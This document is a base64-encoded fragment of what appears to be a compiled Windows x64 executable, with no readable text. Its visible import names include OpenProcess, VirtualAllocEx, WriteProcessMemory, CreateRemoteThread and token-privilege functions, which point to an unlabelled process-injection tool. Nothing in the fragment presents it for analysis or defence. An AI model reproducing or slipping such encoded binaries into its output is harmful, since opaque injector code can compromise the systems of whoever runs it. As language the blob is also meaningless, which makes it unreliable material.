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Nsb3NlSGFuZGxlALgCR2V0UHJvY0FkZHJlc3MAANoFVmlydHVhbEFsbG9jRXgAAIECR2V0TW9kdWxlSGFuZGxlVwAA6gBDcmVhdGVSZW1vdGVUaHJlYWQAAN0FVmlydHVhbEZyZWVFeABLRVJORUwzMi5kbGwAABUCT3BlblByb2Nlc3NUb2tlbgAAHwBBZGp1c3RUb2tlblByaXZpbGVnZXMArwFMb29rdXBQcml2aWxlZ2VWYWx1ZVcAQURWQVBJMzIuZGxsAAARBldpZGVDaGFyVG9NdWx0aUJ5dGUAOAFFbnRlckNyaXRpY2FsU2VjdGlvbgAAxANMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAbANJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uRXgAFAFEZWxldGVDcml0aWNhbFNlY3Rpb24ANAFFbmNvZGVQb2ludGVyAA0BRGVjb2RlUG9pbnRlcgD2A011bHRpQnl0ZVRvV2lkZUNoYXIAtwNMQ01hcFN0cmluZ0V4AOECR2V0U3RyaW5nVHlwZVcAAMoBR2V0Q1BJbmZvANUEUnRsQ2FwdHVyZUNvbnRleHQA3ARSdGxMb29rdXBGdW5jdGlvbkVudHJ5AADjBFJ0bFZpcnR1YWxVbndpbmQAAMAFVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAAB/BVNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgCeBVRlcm1pbmF0ZVByb2Nlc3MAAIwDSXNQcm9jZXNzb3JGZWF0dXJlUHJlc2VudABSBFF1ZXJ5UGVyZm9ybWFuY2VDb3VudGVyACECR2V0Q3VycmVudFByb2Nlc3NJZAAlAkdldEN1cnJlbnRUaHJlYWRJZAAA8wJHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQBvA0luaXRpYWxpemVTTGlzdEhlYWQAhQNJc0RlYnVnZ2VyUHJlc2VudADaAkdldFN0YXJ0dXBJbmZvVwDiBFJ0bFVud2luZEV4AN4EUnRsUGNUb0ZpbGVIZWFkZXIAaARSYWlzZUV4Y2VwdGlvbgAAQQVTZXRMYXN0RXJyb3IAAGsDSW5pdGlhbGl6ZUNyaXRpY2FsU2VjdGlvbkFuZFNwaW5Db3VudACwBVRsc0FsbG9jAACyBVRsc0dldFZhbHVlALMFVGxzU2V0VmFsdWUAsQVUbHNGcmVlALQBRnJlZUxpYnJhcnkAygNMb2FkTGlicmFyeUV4VwAA3AJHZXRTdGRIYW5kbGUAACUGV3JpdGVGaWxlAH0CR2V0TW9kdWxlRmlsZU5hbWVXAABnAUV4aXRQcm9jZXNzAIACR2V0TW9kdWxlSGFuZGxlRXhXAADfAUdldENvbW1hbmRMaW5lQQDgAUdldENvbW1hbmRMaW5lVwBRA0hlYXBBbGxvYwBVA0hlYXBGcmVlAACeAENvbXBhcmVTdHJpbmdXAAC4A0xDTWFwU3RyaW5nVwAAbgJHZXRMb2NhbGVJbmZvVwAAlANJc1ZhbGlkTG9jYWxlAB4DR2V0VXNlckRlZmF1bHRMQ0lEAABcAUVudW1TeXN0ZW1Mb2NhbGVzVwAAWAJHZXRGaWxlVHlwZQBGAkdldEV4aXRDb2RlUHJvY2VzcwAA6ABDcmVhdGVQcm9jZXNzVwAATAJHZXRGaWxlQXR0cmlidXRlc0V4VwAAqAFGbHVzaEZpbGVCdWZmZXJzAAAJAkdldENvbnNvbGVPdXRwdXRDUAAABQJHZXRDb25zb2xlTW9kZQAAeQRSZWFkRmlsZQAAVgJHZXRGaWxlU2l6ZUV4ADMFU2V0RmlsZVBvaW50ZXJFeAAAdgRSZWFkQ29uc29sZVcAAFgDSGVhcFJlQWxsb2MAfgFGaW5kQ2xvc2UAhAFGaW5kRmlyc3RGaWxlRXhXAACVAUZpbmROZXh0RmlsZVcAkgNJc1ZhbGlkQ29kZVBhZ2UAuwFHZXRBQ1AAAKECR2V0T0VNQ1AAAEECR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAswFGcmVlRW52aXJvbm1lbnRTdHJpbmdzVwAkBVNldEVudmlyb25tZW50VmFyaWFibGVXAFsFU2V0U3RkSGFuZGxlAAC+AkdldFByb2Nlc3NIZWFwAABaA0hlYXBTaXplAADOAENyZWF0ZUZpbGVXACQGV3JpdGVDb25zb2xlVwDhBFJ0bFVud2luZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8BAAAACgAAAAAAAAD/////AAAAADKi3y2ZKwAAzV0g0mbU//91mAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAgAAAAAAAAAAAIAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIgAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBIEQAEAAABkLgRAAQAAAGQuBEABAAAAZC4EQAEAAABkLgRAAQAAAGQuBEABAAAAZC4EQAEAAABkLgRAAQAAAGQuBEABAAAAZC4EQAEAAAB/f39/f39/fxQSBEABAAAAaC4EQAEAAABoLgRAAQAAAGguBEABAAAAaC4EQAEAAABoLgRAAQAAAGguBEABAAAAaC4EQAEAAABwEQRAAQAAAC4AAAAuAAAAUAIDQAEAAABSBwNAAQAAAAwAAAAIAAAAAgAAAAAAAAAAAAAAAAAAAFQHA0ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAIAACgoKAAAAAAAAAAAAAAD/////AAAAAFACA0ABAAAAAQAAAAAAAAABAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgUBEABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBQEQAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIFARAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgUBEABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBQEQAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcBEEQAEAAAAAAAAAAAAAAAAAAAAAAAAA0AQDQAEAAABQBgNAAQAAAIA8A0ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoBIEQAEAAADQFgRAAQAAAEMAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAgICAgICAgICAgICAgICAgMDAwMDAwMDAAAAAAAAAAD+////AAAAAAAAAAAAAAAAUFNUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBEVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFMAVAAAAA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